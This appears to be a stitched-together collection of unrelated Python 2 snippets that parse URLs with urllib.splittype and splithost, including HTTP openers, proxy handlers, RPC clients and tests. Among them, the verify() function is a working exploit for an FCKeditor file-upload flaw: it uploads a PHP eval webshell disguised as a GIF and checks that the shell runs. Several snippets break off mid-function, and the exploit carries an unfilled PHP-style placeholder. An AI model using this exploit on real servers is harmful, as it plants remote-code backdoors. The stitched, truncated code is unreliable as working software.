def open_http(self, url, data=None):
    """Use HTTP protocol."""
    import httplib
    user_passwd = None
    if type(url) is type(""):
        host, selector = splithost(url)
        if host:
            user_passwd, host = splituser(host)
            host = unquote(host)
        realhost = host
    else:
        host, selector = url
        urltype, rest = splittype(selector)
        url = rest
        user_passwd = None
        if string.lower(urltype) != 'http':
            realhost = None
        else:
            realhost, rest = splithost(rest)
            if realhost:
                user_passwd, realhost = splituser(realhost)
            if user_passwd:
                selector = "%s://%s%s" % (urltype, realhost, rest)
        #print "proxy via http:", host, selector
    if not host:
        raise IOError, ('http error', 'no host given')
    if user_passwd:
        import base64
        auth = string.strip(base64.encodestring(user_passwd))
    else:
        auth = None
    h = httplib.HTTP(host)
    if data is not None:
        h.putrequest('POST', selector)
        h.putheader('Content-type', 'application/x-www-form-urlencoded')
        h.putheader('Content-length', '%d' % len(data))
    else:
        h.putrequest('GET', selector)
    for cookie in self.cookies.items():
        h.putheader('Cookie', '%s=%s;' % cookie)
    if auth:
        h.putheader('Authorization', 'Basic %s' % auth)
    if realhost:
        h.putheader('Host', realhost)
    for args in self.addheaders:
        apply(h.putheader, args)
    h.endheaders()
    if data is not None:
        h.send(data + '\r\n')
    errcode, errmsg, headers = h.getreply()
    if headers and headers.has_key('set-cookie'):
        cookies = headers.getallmatchingheaders('set-cookie')
        for cookie in cookies:
            self.cookies.load(cookie)
    fp = h.getfile()
    if errcode == 200:
        return addinfourl(fp, headers, "http:" + url)
    else:
        if data is None:
            return self.http_error(url, fp, errcode, errmsg, headers)
        else:
            return self.http_error(url, fp, errcode, errmsg, headers, data)
def open_http(url, data=None):
    """Use HTTP protocol."""
    import httplib
    user_passwd = None
    proxy_passwd = None
    if isinstance(url, str):
        host, selector = urllib.splithost(url)
        if host:
            user_passwd, host = urllib.splituser(host)
            host = urllib.unquote(host)
        realhost = host
    else:
        host, selector = url
        # check whether the proxy contains authorization information
        proxy_passwd, host = urllib.splituser(host)
        # now we proceed with the url we want to obtain
        urltype, rest = urllib.splittype(selector)
        url = rest
        user_passwd = None
        if urltype.lower() != 'http':
            realhost = None
        else:
            realhost, rest = urllib.splithost(rest)
            if realhost:
                user_passwd, realhost = urllib.splituser(realhost)
            if user_passwd:
                selector = "%s://%s%s" % (urltype, realhost, rest)
            if urllib.proxy_bypass(realhost):
                host = realhost
        #print "proxy via http:", host, selector
    if not host:
        raise IOError, ('http error', 'no host given')
    if proxy_passwd:
        import base64
        proxy_auth = base64.b64encode(proxy_passwd).strip()
    else:
        proxy_auth = None
    if user_passwd:
        import base64
        auth = base64.b64encode(user_passwd).strip()
    else:
        auth = None
    c = FakeHTTPConnection(host)
    if data is not None:
        c.putrequest('POST', selector)
        c.putheader('Content-Type', 'application/x-www-form-urlencoded')
        c.putheader('Content-Length', '%d' % len(data))
    else:
        c.putrequest('GET', selector)
    if proxy_auth:
        c.putheader('Proxy-Authorization', 'Basic %s' % proxy_auth)
    if auth:
        c.putheader('Authorization', 'Basic %s' % auth)
    if realhost:
        c.putheader('Host', realhost)
    for args in urllib.URLopener().addheaders:
        c.putheader(*args)
    c.endheaders()
    return c
def open_https(self, url, data=None, ssl_context=None):
    if ssl_context is not None and isinstance(ssl_context, SSL.Context):
        self.ctx = ssl_context
    else:
        self.ctx = SSL.Context(DEFAULT_PROTOCOL)
    user_passwd = None
    if isinstance(url, basestring):
        host, selector = urllib.splithost(url)
        if host:
            user_passwd, host = urllib.splituser(host)
            host = urllib.unquote(host)
        realhost = host
    else:
        host, selector = url
        urltype, rest = urllib.splittype(selector)
        url = rest
        user_passwd = None
        if urltype.lower() != 'http':
            realhost = None
        else:
            realhost, rest = urllib.splithost(rest)
            if realhost:
                user_passwd, realhost = urllib.splituser(realhost)
            if user_passwd:
                selector = "%s://%s%s" % (urltype, realhost, rest)
        # print("proxy via http:", host, selector)
    if not host:
        raise IOError('http error', 'no host given')
    if user_passwd:
        import base64
        auth = base64.encodestring(user_passwd).strip()
    else:
        auth = None
    # Start here!
    h = httpslib.HTTPSConnection(host=host, ssl_context=self.ctx)
    # h.set_debuglevel(1)
    # Stop here!
    if data is not None:
        h.putrequest('POST', selector)
        h.putheader('Content-type', 'application/x-www-form-urlencoded')
        h.putheader('Content-length', '%d' % len(data))
    else:
        h.putrequest('GET', selector)
    if auth:
        h.putheader('Authorization', 'Basic %s' % auth)
    for args in self.addheaders:
        apply(h.putheader, args)
    h.endheaders()
    if data is not None:
        h.send(data + '\r\n')
    # Here again!
    resp = h.getresponse()
    fp = resp.fp
    return urllib.addinfourl(fp, resp.msg, "https:" + url)
def flushsquid():
    prefix = request.query.jsoncallback
    RawUrls = request.query.urls
    urlstype = int(request.query.urlstype)
    LogKeyName = "key" + str(request.query.key)
    if RawUrls.strip() == "":
        DataDict = {'success': '0', 'text': 'Please enter the list of URLs to refresh!'}
        return prefix + "(" + ujson.encode(DataDict) + ")"
    else:
        RawUrls = RawUrls.strip(",")
        UrlsList = RawUrls.split(",")
        QuitFlag = False
        PathList = []
        # Check that the received URLs all belong to the same domain and are
        # of the same type (all files or all directories).
        FirstUrl = UrlsList[0]
        proto, rest = urllib.splittype(FirstUrl)
        DomainName, path = urllib.splithost(rest)
        if "." in path:
            UrlType = "file"
        else:
            UrlType = "dir"
        for url in UrlsList:
            proto, rest = urllib.splittype(url)
            Thost, Tpath = urllib.splithost(rest)
            if "." in Tpath:
                TUrlType = "file"
            else:
                TUrlType = "dir"
            if DomainName != Thost or UrlType != TUrlType:
                QuitFlag = True
                break
            else:
                PathList.append(Tpath)
        if QuitFlag == False:
            try:
                # Invoke the cache purge worker
                PurgeCacheObj = exeCachePurge(UrlType, PathList, DomainName, LogKeyName)
                PurgeCacheObj.start()
            except Exception, e:
                DataDict = {'success': '0', 'text': '%s' % e}
            else:
                DataDict = {'success': '1'}
def open_http(self, url):
    """Use HTTP protocol."""
    if isinstance(url, str):
        host, selector = urllib.splithost(url)
        if host:
            user_passwd, host = urllib.splituser(host)
            host = urllib.unquote(host)
        realhost = host
    else:
        host, selector = url
        urltype, rest = urllib.splittype(selector)
        url = rest
        user_passwd = None
        if urltype.lower() != "http":
            realhost = None
        else:
            realhost, rest = urllib.splithost(rest)
            if realhost:
                user_passwd, realhost = urllib.splituser(realhost)
            if user_passwd:
                selector = "%s://%s%s" % (urltype, realhost, rest)
            if urllib.proxy_bypass(realhost):
                host = realhost
    if not host:
        return -2
    h = httplib.HTTP(host)
    h.putrequest("GET", selector)
    if realhost:
        h.putheader("Host", realhost)
    for args in self.addheaders:
        h.putheader(*args)
    h.endheaders()
    errcode, errmsg, headers = h.getreply()
    return errcode
def __init__(self, ec2_url, ec2_region, ec2_access_key, ec2_secret_key,
             vpc=None, storage_path=None, request_floating_ip=False):
    self._url = ec2_url
    self._region_name = ec2_region
    self._access_key = ec2_access_key
    self._secret_key = ec2_secret_key
    self._vpc = vpc
    self.request_floating_ip = request_floating_ip

    # read all parameters from url
    proto, opaqueurl = urllib.splittype(ec2_url)
    self._host, self._ec2path = urllib.splithost(opaqueurl)
    self._ec2host, port = urllib.splitport(self._host)
    if port:
        port = int(port)
    self._ec2port = port

    if proto == "https":
        self._secure = True
    else:
        self._secure = False

    # will be initialized upon first connect
    self._ec2_connection = None
    self._vpc_connection = None
    self._vpc_id = None
    self._region = None
    self._instances = {}
    self._cached_instances = []
    self._images = None
def request(self, host, handler, request_body, verbose=0):
    type, r_type = splittype(self.proxy)
    if 'http' in type:
        phost, XXX = splithost(r_type)
    else:
        phost = self.proxy

    puser_pass = None
    if '@' in phost:
        user_pass, phost = phost.split('@', 1)
        if ':' in user_pass:
            user, password = user_pass.split(':', 1)
            puser_pass = base64.encodestring('%s:%s' % (unquote(user),
                                                        unquote(password))).strip()

    urlopener = urllib.FancyURLopener({'http': 'http://%s' % phost})
    if not puser_pass:
        urlopener.addheaders = [('User-agent', self.user_agent)]
    else:
        urlopener.addheaders = [('User-agent', self.user_agent),
                                ('Proxy-authorization', 'Basic ' + puser_pass)]

    host = unquote(host)
    f = urlopener.open("http://%s%s" % (host, handler), request_body)
    self.verbose = verbose
    return self.parse_response(f)
def do_request_(self, request):
    host = request.get_host()
    if not host:
        raise URLError('no host given')

    if request.has_data():  # POST
        data = request.get_data()
        if not request.has_header('Content-type'):
            request.add_unredirected_header(
                'Content-type',
                'application/x-www-form-urlencoded')
        if not request.has_header('Content-length'):
            request.add_unredirected_header(
                'Content-length', '%d' % len(data))

    scheme, sel = splittype(request.get_selector())
    sel_host, sel_path = splithost(sel)
    if not request.has_header('Host'):
        request.add_unredirected_header('Host', sel_host or host)
    for name, value in self.parent.addheaders:
        name = name.capitalize()
        if not request.has_header(name):
            request.add_unredirected_header(name, value)

    return request
def test_empty_string_proxy_username(self):
    """
    Yoram Hekma submitted a patch[0] that ensured that an empty string in the
    proxy username would not count as the user supplying a username. This test
    ensures that behavior is tested.

    [0] https://github.com/pulp/nectar/pull/47
    """
    kwargs = {'proxy_url': 'https://invalid-proxy.com', 'proxy_port': 1234,
              'proxy_username': '', 'proxy_password': ''}
    proxy_host = urllib.splithost(urllib.splittype(kwargs['proxy_url'])[1])[0]
    cfg = config.DownloaderConfig(**kwargs)
    session = threaded.build_session(cfg)

    self.assertEqual(session.stream, True)
    self.assertFalse(hasattr(session.auth, 'proxy_username'))
    self.assertFalse(hasattr(session.auth, 'proxy_password'))
    # Since the user provided the empty string for the proxy username, the
    # username and password should be missing in the session proxies.
    self.assertEqual(session.proxies,
                     {'http': 'https://%s:%d' % (proxy_host, kwargs['proxy_port']),
                      'https': 'https://%s:%d' % (proxy_host, kwargs['proxy_port'])})
def parse_callback_url(self, callback_url):
    proto, rest = urllib.splittype(callback_url)
    host, rest = urllib.splithost(rest)
    host, port = urllib.splitport(host)
    if not port:
        port = 443
    return host, port
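# A minimal sketch (hypothetical URL) of the splittype/splithost/splitport
# chain used by parse_callback_url above. Note that Python 2's
# urllib.splitport returns the port as a *string*, so the 443 fallback is
# the only case where the returned port is an int.
import urllib

proto, rest = urllib.splittype('https://host.example:8443/callback')
# proto == 'https', rest == '//host.example:8443/callback'
host, rest = urllib.splithost(rest)
# host == 'host.example:8443', rest == '/callback'
host, port = urllib.splitport(host)
# host == 'host.example', port == '8443' (a string, not an int)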
def test_build_session(self):
    kwargs = {'basic_auth_username': '******',
              'basic_auth_password': '******',
              'ssl_validation': False,
              'ssl_client_cert_path': os.path.join(_find_data_directory(), 'pki/bogus/cert.pem'),
              'ssl_client_key_path': os.path.join(_find_data_directory(), 'pki/bogus/key.pem'),
              'proxy_url': 'https://invalid-proxy.com',
              'proxy_port': 1234,
              'proxy_username': '******',
              'proxy_password': '******'}
    proxy_host = urllib.splithost(urllib.splittype(kwargs['proxy_url'])[1])[0]
    cfg = config.DownloaderConfig(**kwargs)
    session = threaded.build_session(cfg)

    self.assertEqual(session.stream, True)
    self.assertEqual(session.auth,
                     (kwargs['basic_auth_username'], kwargs['basic_auth_password']))
    self.assertEqual(session.cert,
                     (kwargs['ssl_client_cert_path'], kwargs['ssl_client_key_path']))
    self.assertEqual(session.proxies,
                     {'http': 'https://%s:%s@%s:%d' % (kwargs['proxy_username'],
                                                       kwargs['proxy_password'],
                                                       proxy_host, kwargs['proxy_port']),
                      'https': 'http://%s:%s@%s:%d' % (kwargs['proxy_username'],
                                                       kwargs['proxy_password'],
                                                       proxy_host, kwargs['proxy_port'])})
def verify(self):
    url = self.target
    filename = "ice.gif"
    foldername = "ice.php%00.gif"
    connector = "editor/filemanager/connectors/php/connector.php"
    proto, rest = urllib.splittype(url)
    host, rest = urllib.splithost(rest)

    payload = "-----------------------------265001916915724\r\n"
    payload += "Content-Disposition: form-data; name=\"NewFile\"; filename=\"ice.gif\"\r\n"
    payload += "Content-Type: image/jpeg\r\n\r\n"
    payload += 'GIF89a' + "\r\n" + '<?php eval($_POST[ice]) ?>' + "\n"
    payload += "-----------------------------265001916915724--\r\n"

    packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=" + foldername + " HTTP/1.0\r\n"
    packet += "Host: " + host + "\r\n"
    packet += "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n"
    packet += "Content-Length: " + str(len(payload)) + "\r\n"
    packet += "Connection: close\r\n\r\n"
    packet += payload

    webshell_url = url + '/uploadfile/file/ice.php'
    urllib2.urlopen(url, data=packet, timeout=5)
    request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
    response = urllib2.urlopen(request).read()
    if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
        self.result['status'] = True
        # %% escapes the literal %00 for the %-format below
        self.result['info'] = ("Target has the FCKeditor 2.6.4 %%00 truncation "
                               "arbitrary file upload vulnerability, "
                               "webshell: %s, password ice" % webshell_url)
def __init__(self, username=None, password=None, serverurl=None):
    self.username = username
    self.password = password
    self.verbose = False
    self.serverurl = serverurl
    if serverurl.startswith("http://"):
        type, uri = urllib.splittype(serverurl)
        host, path = urllib.splithost(uri)
        host, port = urllib.splitport(host)
        if port is None:
            port = 80
        else:
            port = int(port)

        def get_connection(host=host, port=port):
            return httplib.HTTPConnection(host, port)

        self._get_connection = get_connection
    elif serverurl.startswith("unix://"):
        def get_connection(serverurl=serverurl):
            # we use 'localhost' here because domain names must be
            # < 64 chars (or we'd use the serverurl filename)
            conn = UnixStreamHTTPConnection("localhost")
            conn.socketfile = serverurl[7:]
            return conn

        self._get_connection = get_connection
    else:
        raise ValueError("Unknown protocol for serverurl %s" % serverurl)
def _add_proxy(session, config):
    if None in (config.proxy_url, config.proxy_port):
        return

    # Set session.proxies according to given url and port
    protocol, remainder = urllib.splittype(config.proxy_url)
    host, remainder = urllib.splithost(remainder)
    url = ':'.join((host, str(config.proxy_port)))
    if config.proxy_username:
        password_part = config.get('proxy_password', '') and ':%s' % config.proxy_password
        auth = config.proxy_username + password_part
        auth = urllib.quote(auth, safe=':')
        url = '@'.join((auth, url))
    session.proxies['https'] = '://'.join((protocol, url))
    session.proxies['http'] = '://'.join((protocol, url))

    # Set session.auth if proxy username is specified
    if config.proxy_username is not None:
        proxy_password = config.get('proxy_password', '')
        if None in (config.basic_auth_username, config.basic_auth_password):
            # bz 1021662 - Proxy authentication using username and password in
            # session.proxies urls does not set up correct headers in the http
            # download request because of a bug in urllib3. This is an
            # alternate approach which sets up the headers correctly.
            session.auth = requests.auth.HTTPProxyAuth(config.proxy_username,
                                                       proxy_password)
        else:
            # The approach mentioned above works well except when basic user
            # authentication is used along with the proxy authentication.
            # Therefore, we define and use a custom class which inherits the
            # AuthBase class provided by the requests library to add the
            # headers correctly.
            session.auth = HTTPBasicWithProxyAuth(config.basic_auth_username,
                                                  config.basic_auth_password,
                                                  config.proxy_username,
                                                  proxy_password)
def compile(self):
    """Validate the user submitted url address at compile stage.

    The url address will be tested with the configured regex patterns
    loaded from :attr:`BaseHost.compiler_params`.

    Refer to :ref:`hwnetapi` for more details about the rules.
    """
    if self.config['urlrule']:
        p = re.compile(self.config['urlrule'])
        if not p.match(self.config['remote_addr']):
            raise NetApiAddressRejected(compile_error=lazy_gettext(
                'Address "%(url)s" does not match pattern "%(rule)s"',
                url=self.config['remote_addr'], rule=self.config['urlrule']
            ))
    if self.config['iprule']:
        domain = urllib.splitport(
            urllib.splithost(
                urllib.splittype(self.config['remote_addr'])[1]
            )[0]
        )[0]
        # get ip from domain
        try:
            ipaddr = socket.gethostbyname(domain)
        except Exception:
            logger.exception(
                'Could not get ip address for domain "%s".' % domain)
            ipaddr = '<invalid>'
        # ip not match, skip
        p = re.compile(self.config['iprule'])
        if not p.match(ipaddr):
            raise NetApiAddressRejected(compile_error=lazy_gettext(
                'IP address "%(ip)s" does not match pattern "%(rule)s"',
                ip=ipaddr, rule=self.config['iprule']
            ))
def __init__(self, uri, transport=None, encoding=None,
             verbose=0, version=None):
    import urllib
    if not version:
        version = config.version
    self.__version = version
    schema, uri = urllib.splittype(uri)
    if schema not in ('http', 'https', 'unix'):
        raise IOError('Unsupported JSON-RPC protocol.')
    if schema == 'unix':
        if not USE_UNIX_SOCKETS:
            # Don't like the "generic" Exception...
            raise UnixSocketMissing("Unix sockets not available.")
        self.__host = uri
        self.__handler = '/'
    else:
        self.__host, self.__handler = urllib.splithost(uri)
        if not self.__handler:
            # Not sure if this is in the JSON spec?
            self.__handler = '/'
    if transport is None:
        if schema == 'unix':
            transport = UnixTransport()
        elif schema == 'https':
            transport = SafeTransport()
        else:
            transport = Transport()
    self.__transport = transport
    self.__encoding = encoding
    self.__verbose = verbose
def request(self, method, url, body=None, headers={}):
    # Request is called before connect, so can interpret url and get
    # real host/port to be used to make CONNECT request to proxy
    proto, rest = urllib.splittype(url)
    if proto is None:
        raise ValueError, "unknown URL type: %s" % url
    # Get host
    host, rest = urllib.splithost(rest)
    # Try to get port
    host, port = urllib.splitport(host)
    # If port is not defined try to get from proto
    if port is None:
        try:
            port = self._ports[proto]
        except KeyError:
            raise ValueError, "unknown protocol for: %s" % url
    self._real_host = host
    self._real_port = int(port)
    httplib.HTTPConnection.request(self, method, rest, body, headers)
def start(self, destfile=None, destfd=None):
    urllib._urlopener = OLPCURLopener()
    self._info = urllib.urlopen(self._url)
    self._outf = None
    self._fname = None
    if destfd and not destfile:
        raise ValueError('Must provide destination file too when'
                         ' specifying file descriptor')
    if destfile:
        self._suggested_fname = os.path.basename(destfile)
        self._fname = os.path.abspath(os.path.expanduser(destfile))
        if destfd:
            # Use the user-supplied destination file descriptor
            self._outf = destfd
        else:
            self._outf = os.open(self._fname,
                                 os.O_RDWR | os.O_TRUNC | os.O_CREAT, 0644)
    else:
        fname = self._get_filename_from_headers(self._info.headers)
        self._suggested_fname = fname
        garbage_, path = urllib.splittype(self._url)
        garbage_, path = urllib.splithost(path or "")
        path, garbage_ = urllib.splitquery(path or "")
        path, garbage_ = urllib.splitattr(path or "")
        suffix = os.path.splitext(path)[1]
        (self._outf, self._fname) = tempfile.mkstemp(suffix=suffix,
                                                     dir=self._destdir)

    fcntl.fcntl(self._info.fp.fileno(), fcntl.F_SETFD, os.O_NDELAY)
    self._srcid = GObject.io_add_watch(self._info.fp.fileno(),
                                       GObject.IO_IN | GObject.IO_ERR,
                                       self._read_next_chunk)
def stripy_article_list(self, section_name, page_num):
    try:
        self.cur_page = page_num
        article_list = []
        if page_num == 0:
            url = self.section_url_map[section_name]
        else:
            url = self.section_url_map[section_name][0:-8] + '_' + str(self.cur_page) + '.shtml'
        contentHtml = self.session.get(url, stream=True)
        encoding = chardet.detect(contentHtml.content)['encoding']
        if contentHtml.status_code == requests.codes.ok:
            pattern = r'<a href=\'(.*?)\'.*?<font class=a19_articlelist>(.*?)</a>.*?>(.*?)</td>'
            for mtFind in re.finditer(pattern, contentHtml.content, re.S):
                if mtFind.groups()[0][0:4] == "http":
                    article_url = mtFind.groups()[0]
                else:
                    proto, rest = urllib.splittype(self.section_url_map[section_name])
                    article_url = proto + "://" + urllib.splithost(rest)[0] + "/" + mtFind.groups()[0].strip("../")
                public_time = self.strip_tags(mtFind.groups()[2])
                title = mtFind.groups()[1].decode(encoding)
                item = article_item(article_url, title, public_time)
                item.set_section_name(section_name)
                article_list.append(item)
        else:
            self.logger.error(u'failed to fetch the article list, page ' + str(page_num))
    except BaseException, e:
        self.logger.error(str(e))
def __init__(self, url, config=Config):
    proto, uri = urllib.splittype(url)

    # apply some defaults
    if uri[0:2] != '//':
        if proto != None:
            uri = proto + ':' + uri
        uri = '//' + uri
        proto = 'http'

    host, path = urllib.splithost(uri)

    try:
        int(host)
        host = 'localhost:' + host
    except:
        pass

    if not path:
        path = '/'

    if proto not in ('http', 'https', 'httpg'):
        raise IOError, "unsupported SOAP protocol"
    if proto == 'httpg' and not config.GSIclient:
        raise AttributeError, \
            "GSI client not supported by this Python installation"
    if proto == 'https' and not config.SSLclient:
        raise AttributeError, \
            "SSL client not supported by this Python installation"

    self.user, host = urllib.splituser(host)
    self.proto = proto
    self.host = host
    self.path = path
def do_open(self, http_class, req):
    host = req.get_host()
    if not host:
        raise URLError('no host given')

    h = http_class(host)  # will parse host:port
    if req.has_data():
        data = req.get_data()
        h.putrequest('POST', req.get_selector())
        if not req.headers.has_key('Content-type'):
            h.putheader('Content-type',
                        'application/x-www-form-urlencoded')
        if not req.headers.has_key('Content-length'):
            h.putheader('Content-length', '%d' % len(data))
    else:
        h.putrequest('GET', req.get_selector())

    scheme, sel = splittype(req.get_selector())
    sel_host, sel_path = splithost(sel)
    h.putheader('Host', sel_host or host)
    for args in self.parent.addheaders:
        h.putheader(*args)
    for k, v in req.headers.items():
        h.putheader(k, v)
    # httplib will attempt to connect() here. be prepared
    # to convert a socket error to a URLError.
    try:
        h.endheaders()
    except socket.error, err:
        raise URLError(err)
def __init__(self, uri, transport=None, encoding=None, verbose=0,
             auth_username=None, auth_password=None):
    # establish a "logical" server connection

    # get the url
    import urllib
    type, uri = urllib.splittype(uri)
    if type:
        if type not in ("http", "https"):
            raise IOError, "unsupported XML-RPC protocol"
        self.__host, self.__handler = urllib.splithost(uri)
        if not self.__handler:
            self.__handler = "/RPC2"
        if transport is None:
            if type == "https":
                transport = SafeTransport()
            else:
                transport = Transport()
    else:
        self.__host = uri
        transport = RawTransport()

    self.__transport = transport
    self.__encoding = encoding
    self.__verbose = verbose
    self.__username = auth_username
    self.__password = auth_password
def request(self, method, url, body=None, headers={}):
    """ Make CONNECT request to proxy. """
    proto, rest = urllib.splittype(url)
    if proto is None:
        raise ValueError, "unknown URL type: %s" % url
    # Get hostname.
    host = urllib.splithost(rest)[0]
    # Get port, if one is given.
    host, port = urllib.splitport(host)
    # When no port is given, use the hardcoded default for the protocol.
    if port is None:
        try:
            port = self._ports[proto]
        except KeyError:
            raise ValueError, "unknown protocol for: %s" % url
    # Remember.
    self._real_host = host
    self._real_port = port
    # Remember auth if there.
    if headers.has_key("Proxy-Authorization"):
        self._proxy_authorization = headers["Proxy-Authorization"]
        del headers["Proxy-Authorization"]
    else:
        self._proxy_authorization = None
    httplib.HTTPConnection.request(self, method, url, body, headers)
def __init__(self, url, _client=None):
    Transport.__init__(self, url)
    (scheme, _, loc, _, _) = urlparse.urlsplit(url)
    assert scheme == "git"
    hostport, self._path = urllib.splithost(loc)
    (self._host, self._port) = urllib.splitnport(hostport,
                                                 git.protocol.TCP_GIT_PORT)
    self._client = _client
def init_server(self, myuri):
    # Borrowed the following from rpcServer.py
    # rpclib.Server.__init__(self, uri, transport=self.rpc_args['transport'],
    #     encoding=self.rpc_args['encoding'], verbose=self.rpc_args['verbose'],
    #     proxy=self.rpc_args['proxy'], username=self.rpc_args['username'],
    #     password=self.rpc_args['password'],
    #     refreshCallback=self.rpc_args['refreshCallback'],
    #     progressCallback=self.rpc_args['progressCallback'])
    self._uri = myuri
    typ, uri = urllib.splittype(self._uri)
    typ = typ.lower()
    if typ not in ("http", "https"):
        raise InvalidRedirectionError(
            "Redirected to unsupported protocol %s" % typ)

    self._host, self._handler = urllib.splithost(uri)
    self._orig_handler = self._handler
    self._type = typ
    if not self._handler:
        self._handler = self.rpc_handler
    self._allow_redirect = 1
    del self._transport
    self._transport = self.default_transport(typ, self._proxy,
                                             self._username, self._password)
    self.set_progress_callback(self._progressCallback)
    self.set_refresh_callback(self._refreshCallback)
    self.set_buffer_size(self._bufferSize)
    self.setlang(self._lang)

    if self._trusted_cert_files != [] and \
            hasattr(self._transport, "add_trusted_cert"):
        for certfile in self._trusted_cert_files:
            self._transport.add_trusted_cert(certfile)
def __init__(self, uri, transport=None, encoding=None, verbose=0,
             allow_none=0, use_datetime=0):
    # establish a "logical" server connection
    if DEBUG:
        print "[Proxy.__init__(%s, %s, %s, %s, %s, %s)]" % \
            (uri, transport, encoding, verbose, allow_none, use_datetime)

    # get the url
    import urllib
    type, host = urllib.splittype(uri)
    if type.lower() != "gbx":
        try:
            # Parameter use_datetime is available since Python 2.5
            xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding,
                                           verbose, allow_none, use_datetime)
        except TypeError:
            xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding,
                                           verbose, allow_none)
    else:
        self._ServerProxy__host, self._ServerProxy__handler = urllib.splithost(host)
        if not self._ServerProxy__handler:
            self._ServerProxy__handler = "/RPC2"
        self._ServerProxy__transport = transport or Transport(use_datetime)
        self._ServerProxy__encoding = encoding
        self._ServerProxy__verbose = verbose
        if DEBUG:
            print type, self._ServerProxy__host, \
                self._ServerProxy__handler, self._ServerProxy__transport, \
                self._ServerProxy__encoding, self._ServerProxy__verbose
def _get_real_authority(self):
    """
    Return the authority specification of the originally requested URL.

    The return value is a string of the form <host>:<port>.
    """
    url = self._proxy_request.get_selector()

    proto, rest = urllib.splittype(url)
    if proto is None:
        raise ValueError("unknown URL type: %s" % url)

    # Get the host and port specification
    host, rest = urllib.splithost(rest)
    host, port = urllib.splitport(host)

    # If port is not defined, then try to get it from the protocol.
    if port is None:
        try:
            port = self._ports[proto]
        except KeyError:
            raise ValueError("unknown protocol for: %s" % url)

    # splitport returns the port as a string; coerce it for the %d format.
    return '%s:%d' % (host, int(port))
def __init__(self, url, progress_cb=None, auth=None, config=None,
             client_string_func=None, open_tmp_file_func=None):
    self.url = url
    (type, opaque) = urllib.splittype(url)
    assert type in ("svn", "svn+ssh")
    (host, path) = urllib.splithost(opaque)
    self._progress_cb = progress_cb
    self._auth = auth
    self._config = config
    self._client_string_func = client_string_func
    # open_tmp_file_func is ignored, as it is not needed for svn://
    if type == "svn":
        (recv_func, send_func) = self._connect(host)
    else:
        (recv_func, send_func) = self._connect_ssh(host)
    super(SVNClient, self).__init__(recv_func, send_func)
    (min_version, max_version, _, self._server_capabilities) = self._recv_greeting()
    self.send_msg([max_version,
                   [literal(x) for x in CAPABILITIES
                    if x in self._server_capabilities],
                   self.url])
    (self._server_mechanisms, mech_arg) = self._unpack()
    if self._server_mechanisms != []:
        # FIXME: Support other mechanisms as well
        self.send_msg([literal("ANONYMOUS"),
                       [base64.b64encode("anonymous@%s" % socket.gethostname())]])
        self.recv_msg()
    msg = self._unpack()
    if len(msg) > 2:
        self._server_capabilities += msg[2]
    (self._uuid, self._root_url) = msg[0:2]
    self.busy = False
def do_request_(self, request): host = request.get_host() if not host: raise URLError("no host given") if request.has_data(): # POST data = request.get_data() if not request.has_header("Content-type"): request.add_unredirected_header("Content-type", "application/x-www-form-urlencoded") if not request.has_header("Content-length"): request.add_unredirected_header("Content-length", "%d" % len(data)) sel_host = host if request.has_proxy(): scheme, sel = splittype(request.get_selector()) sel_host, sel_path = splithost(sel) if not request.has_header("Host"): request.add_unredirected_header("Host", sel_host) for name, value in self.parent.addheaders: name = name.capitalize() if not request.has_header(name): request.add_unredirected_header(name, value) return request
def processRequest(self, method=None, url=None, data="", headers={}):
    conf = desktop.Config()
    if not conf['proxy']:
        self.proxy_host = None
        self.proxy_port = None
    else:
        self.proxy_host = conf['proxy']['proxy']
        self.proxy_port = conf['proxy']['proxy_port']

    socket.setdefaulttimeout(self.http_timeout)
    (protocol, resource) = urllib.splittype(url)
    (hostport, path) = urllib.splithost(resource)
    connexion = None
    if protocol.lower() == "http":
        (host, port) = urllib.splitnport(hostport, 80)
        import httplib
        if self.proxy_host != None and self.proxy_port != None:
            connexion = HTTPConnection(self.proxy_host, self.proxy_port,
                                       timeout=self.http_timeout)
            path = url
        else:
            connexion = HTTPConnection(host, port, timeout=self.http_timeout)
    elif protocol.lower() == "https":
        (host, port) = urllib.splitnport(hostport, 443)
        connexion = HTTPSConnection(host, port)
        if self.proxy_host != None and self.proxy_port != None:
            connexion.http_proxy = [self.proxy_host, self.proxy_port]
    else:
        assert False, "Unhandled Protocol, please use HTTP or HTTPS"

    connexion.connect()
    connexion.request(method, path, body=data, headers=headers)
    response = connexion.getresponse()
    return response
def get_domian(url):
    if not url.startswith('http'):
        url = 'http://' + url
    proto, rest = urllib.splittype(url)
    res, rest = urllib.splithost(rest)
    return None if not res else res
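# Hedged usage sketch for get_domian (hypothetical inputs). The scheme is
# stripped, but an explicit port, if present, stays in the result.
print get_domian('www.example.com/foo/bar')     # -> 'www.example.com'
print get_domian('https://example.com:8080/x')  # -> 'example.com:8080'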
def __init__(self, url, method, params):
    Assert(method == 'GET')
    netloc, path = splithost(url)
    if not netloc:
        raise IOError, ('ftp error', 'no host given')
    host, port = splitport(netloc)
    user, host = splituser(host)
    if user:
        user, passwd = splitpasswd(user)
    else:
        passwd = None
    host = socket.gethostbyname(host)
    if port:
        try:
            port = string.atoi(port)
        except string.atoi_error:
            raise IOError, ('ftp error', 'bad port')
    else:
        port = ftplib.FTP_PORT
    path, attrs = splitattr(path)
    self.url = "ftp://%s%s" % (netloc, path)
    dirs = string.splitfields(path, '/')
    dirs, file = dirs[:-1], dirs[-1]
    self.content_length = None
    if not file:
        self.content_type, self.content_encoding = None, None
        type = 'd'
    else:
        self.content_type, self.content_encoding = app.guess_type(file)
        if self.content_encoding:
            type = 'i'
        elif self.content_type and self.content_type[:5] == 'text/':
            type = 'a'
        elif file[-1] == '/':
            type = 'd'
        else:
            type = 'i'
    if dirs and not dirs[0]:
        dirs = dirs[1:]
    key = (user, host, port, string.joinfields(dirs, '/'))
    self.debuglevel = None
    try:
        if not ftpcache.has_key(key):
            ftpcache[key] = []
        for attr in attrs:
            [attr, value] = map(string.lower, splitvalue(attr))
            if attr == 'type' and value in ('a', 'i', 'd'):
                type = value
            elif attr == 'debug':
                try:
                    self.debuglevel = string.atoi(value)
                except string.atoi_error:
                    pass
        candidates = ftpcache[key]
        for cand in candidates:
            if not cand.busy():
                break
        else:
            cand = ftpwrapper(user, passwd, host, port, dirs,
                              self.debuglevel)
            candidates.append(cand)
        # XXX Ought to clean the cache every once in a while
        self.cand = cand
